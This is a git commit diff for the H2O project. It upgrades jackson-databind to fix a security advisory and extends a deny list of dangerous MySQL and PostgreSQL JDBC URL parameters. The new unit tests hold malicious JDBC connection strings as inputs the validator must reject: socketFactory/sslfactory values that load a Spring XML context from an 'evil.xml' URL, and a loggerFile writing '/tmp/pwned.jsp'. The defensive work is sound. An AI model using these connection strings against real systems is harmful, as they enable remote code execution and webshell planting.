Merge remote-tracking branch origin/rel-3.46.0

h2o-ops · h2o-ops · commit 5643c0c38c03 · 2026-03-10T00:30:32.000Z
diff --git a/h2o-assemblies/main/build.gradle b/h2o-assemblies/main/build.gradle
@@ -55,11 +55,12 @@ dependencies {
     api "com.google.protobuf:protobuf-java:3.25.5"
 
     constraints {
-        api('com.fasterxml.jackson.core:jackson-databind:2.17.2') {
+        api('com.fasterxml.jackson.core:jackson-databind:2.18.6') {
             because 'Fixes CVE-2022-42003'
             because 'Fixes PRISMA-2023-0067'
             because 'Fixes CVE-2023-35116'
             because 'Fixes sonatype-2024-0171'
+            because 'Fixes GHSA-72hv-8253-57qq'
         }
         api('org.jetbrains.kotlin:kotlin-stdlib:1.6.21') {
             because 'Fixes CVE-2020-29582'
diff --git a/h2o-assemblies/steam/build.gradle b/h2o-assemblies/steam/build.gradle
@@ -51,11 +51,12 @@ dependencies {
     api "com.google.oauth-client:google-oauth-client:1.33.3"
 
     constraints {
-        api('com.fasterxml.jackson.core:jackson-databind:2.17.2') {
+        api('com.fasterxml.jackson.core:jackson-databind:2.18.6') {
             because 'Fixes CVE-2022-42003'
             because 'Fixes PRISMA-2023-0067'
             because 'Fixes CVE-2023-35116'
             because 'Fixes sonatype-2024-0171'
+            because 'Fixes GHSA-72hv-8253-57qq'            
         }
         api('org.codehaus.jettison:jettison:1.5.4') {
             because 'Fixes CVE-2023-1436'
diff --git a/h2o-core/src/main/java/water/jdbc/SQLManager.java b/h2o-core/src/main/java/water/jdbc/SQLManager.java
@@ -46,8 +46,11 @@ public class SQLManager {
   private static final Pattern JDBC_PARAMETERS_REGEX_PATTERN = Pattern.compile("(?i)([a-z0-9_]+)\\s*=\\s*");
 
   private static final List<String> DEFAULT_JDBC_DISALLOWED_PARAMETERS = Stream.of(
-          "autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql 
-          "allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql 
+          "autoDeserialize", "queryInterceptors", "allowLoadLocalInfile", "allowMultiQueries", //mysql
+          "allowLoadLocalInfileInPath", "allowUrlInLocalInfile", "allowPublicKeyRetrieval", //mysql
+          "statementInterceptors", //mysql
+          "socketFactory", "socketFactoryArg", "sslfactory", "sslfactoryarg", //postgresql
+          "loggerLevel", "loggerFile", //postgresql -- not dangerous but user should not have a reason to use them
           "init", "script", "shutdown" //h2
   ).map(String::toLowerCase).collect(Collectors.toList());
   private static AtomicLong NEXT_TABLE_NUM = new AtomicLong(0);
diff --git a/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java b/h2o-core/src/test/java/water/jdbc/SQLManagerTest.java
@@ -246,6 +246,36 @@ public void testValidateJdbcConnectionStringMysqlMultipleEncodedString() {
     SQLManager.validateJdbcUrl(jdbcConnection);
   }
 
+  @Test
+  public void testValidateJdbcConnectionStringPostgresqlSocketFactory() {
+    exception.expect(IllegalArgumentException.class);
+    exception.expectMessage("Potentially dangerous JDBC parameter found: socketFactory");
+
+    String jdbcConnection = "jdbc:postgresql://127.0.0.1:5432/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:9090/evil.xml";
+
+    SQLManager.validateJdbcUrl(jdbcConnection);
+  }
+
+  @Test
+  public void testValidateJdbcConnectionStringPostgresqlSslFactory() {
+    exception.expect(IllegalArgumentException.class);
+    exception.expectMessage("Potentially dangerous JDBC parameter found: sslfactory");
+
+    String jdbcConnection = "jdbc:postgresql://127.0.0.1:5432/test?sslfactory=org.springframework.context.support.ClassPathXmlApplicationContext&sslfactoryarg=http://127.0.0.1:9090/evil.xml";
+
+    SQLManager.validateJdbcUrl(jdbcConnection);
+  }
+
+  @Test
+  public void testValidateJdbcConnectionStringPostgresqlLoggerLevel() {
+    exception.expect(IllegalArgumentException.class);
+    exception.expectMessage("Potentially dangerous JDBC parameter found: loggerLevel");
+
+    String jdbcConnection = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel=DEBUG&loggerFile=/tmp/pwned.jsp";
+
+    SQLManager.validateJdbcUrl(jdbcConnection);
+  }
+
   /**
    * Test fail if any exception is thrown therefore no assert
    */
@@ -254,4 +284,13 @@ public void testValidateJdbcConnectionStringMysqlPass() {
     String jdbcConnection = "jdbc:mysql://127.0.0.1:3306/mydb?allowedParameter=true";
     SQLManager.validateJdbcUrl(jdbcConnection);
   }
+
+  /**
+   * Test fail if any exception is thrown therefore no assert
+   */
+  @Test
+  public void testValidateJdbcConnectionStringPostgresqlPass() {
+    String jdbcConnection = "jdbc:postgresql://127.0.0.1:5432/mydb?ssl=true&sslmode=require";
+    SQLManager.validateJdbcUrl(jdbcConnection);
+  }
 }
